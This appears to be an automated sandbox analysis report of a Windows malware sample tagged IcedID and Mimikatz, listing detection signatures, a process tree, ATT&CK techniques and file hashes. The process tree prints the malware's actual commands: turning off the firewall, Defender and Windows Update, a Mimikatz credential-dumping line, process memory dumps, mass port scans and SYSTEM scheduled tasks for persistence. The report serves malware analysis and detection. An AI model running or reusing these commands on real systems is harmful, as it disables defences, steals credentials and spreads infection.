Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
27-08-2024 13:32
General
-
Target
2024-08-27_a8c8b041b6422babad43cc88bea0b6e8_hacktools_icedid_mimikatz.exe
-
Size
8.4MB
-
MD5
a8c8b041b6422babad43cc88bea0b6e8
-
SHA1
bcd758e81593bfc71f6b35d877b35dc8bfb8d8e5
-
SHA256
29dfc665f2b70f7579586bdc75c36f731b5eedd2a9366398f6ea23c922ac9743
-
SHA512
495525c912c870acb3da05358118b8261692bb65deb5b055e2ca5cf6c6df48c32380c13b1034cfe16108152889110f4c2fdfc0d264a6858960eb46fb9d17b4a0
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (52355) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Executes dropped EXE 30 IoCs
-
Loads dropped DLL 12 IoCs
-
UPX packed file 38 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
NSIS installer 3 IoCs
-
Modifies data under HKEY_USERS 47 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 25 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\ekleagute\pcgcfj.exe"C:\Windows\TEMP\ekleagute\pcgcfj.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2024-08-27_a8c8b041b6422babad43cc88bea0b6e8_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-08-27_a8c8b041b6422babad43cc88bea0b6e8_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\bipepyze\sabzgqz.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\bipepyze\sabzgqz.exeC:\Windows\bipepyze\sabzgqz.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\bipepyze\sabzgqz.exeC:\Windows\bipepyze\sabzgqz.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tsmmkppcn\mbklagvue\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\tsmmkppcn\mbklagvue\wpcap.exeC:\Windows\tsmmkppcn\mbklagvue\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tsmmkppcn\mbklagvue\cibtlluza.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\tsmmkppcn\mbklagvue\Scant.txt2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\tsmmkppcn\mbklagvue\cibtlluza.exeC:\Windows\tsmmkppcn\mbklagvue\cibtlluza.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\tsmmkppcn\mbklagvue\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tsmmkppcn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\tsmmkppcn\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Windows\tsmmkppcn\Corporate\vfshost.exeC:\Windows\tsmmkppcn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tnfgntztu" /ru system /tr "cmd /c C:\Windows\ime\sabzgqz.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "tnfgntztu" /ru system /tr "cmd /c C:\Windows\ime\sabzgqz.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tibzeneva" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bipepyze\sabzgqz.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "tibzeneva" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bipepyze\sabzgqz.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "euztfpama" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ekleagute\pcgcfj.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "euztfpama" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ekleagute\pcgcfj.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 788 C:\Windows\TEMP\tsmmkppcn\788.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 316 C:\Windows\TEMP\tsmmkppcn\316.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2132 C:\Windows\TEMP\tsmmkppcn\2132.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2584 C:\Windows\TEMP\tsmmkppcn\2584.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\tsmmkppcn\mbklagvue\scan.bat2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\tsmmkppcn\mbklagvue\pejfeyype.exepejfeyype.exe TCP 194.110.0.1 194.110.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2788 C:\Windows\TEMP\tsmmkppcn\2788.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2888 C:\Windows\TEMP\tsmmkppcn\2888.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 1492 C:\Windows\TEMP\tsmmkppcn\1492.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 3828 C:\Windows\TEMP\tsmmkppcn\3828.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 3920 C:\Windows\TEMP\tsmmkppcn\3920.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 3984 C:\Windows\TEMP\tsmmkppcn\3984.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 4072 C:\Windows\TEMP\tsmmkppcn\4072.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2560 C:\Windows\TEMP\tsmmkppcn\2560.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2740 C:\Windows\TEMP\tsmmkppcn\2740.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 4816 C:\Windows\TEMP\tsmmkppcn\4816.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 4776 C:\Windows\TEMP\tsmmkppcn\4776.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 4448 C:\Windows\TEMP\tsmmkppcn\4448.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 4524 C:\Windows\TEMP\tsmmkppcn\4524.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 1304 C:\Windows\TEMP\tsmmkppcn\1304.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 5032 C:\Windows\TEMP\tsmmkppcn\5032.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\yqewma.exeC:\Windows\SysWOW64\yqewma.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\sabzgqz.exe1⤵
-
C:\Windows\ime\sabzgqz.exeC:\Windows\ime\sabzgqz.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\bipepyze\sabzgqz.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\bipepyze\sabzgqz.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ekleagute\pcgcfj.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\ekleagute\pcgcfj.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\sabzgqz.exe1⤵
-
C:\Windows\ime\sabzgqz.exeC:\Windows\ime\sabzgqz.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\bipepyze\sabzgqz.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\bipepyze\sabzgqz.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ekleagute\pcgcfj.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\ekleagute\pcgcfj.exe /p everyone:F2⤵
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
814KB
MD53742e4d6168a7417c684791f5bde804e
SHA115f0cdf62c8880d13aa3fffe6eee73152c0356a7
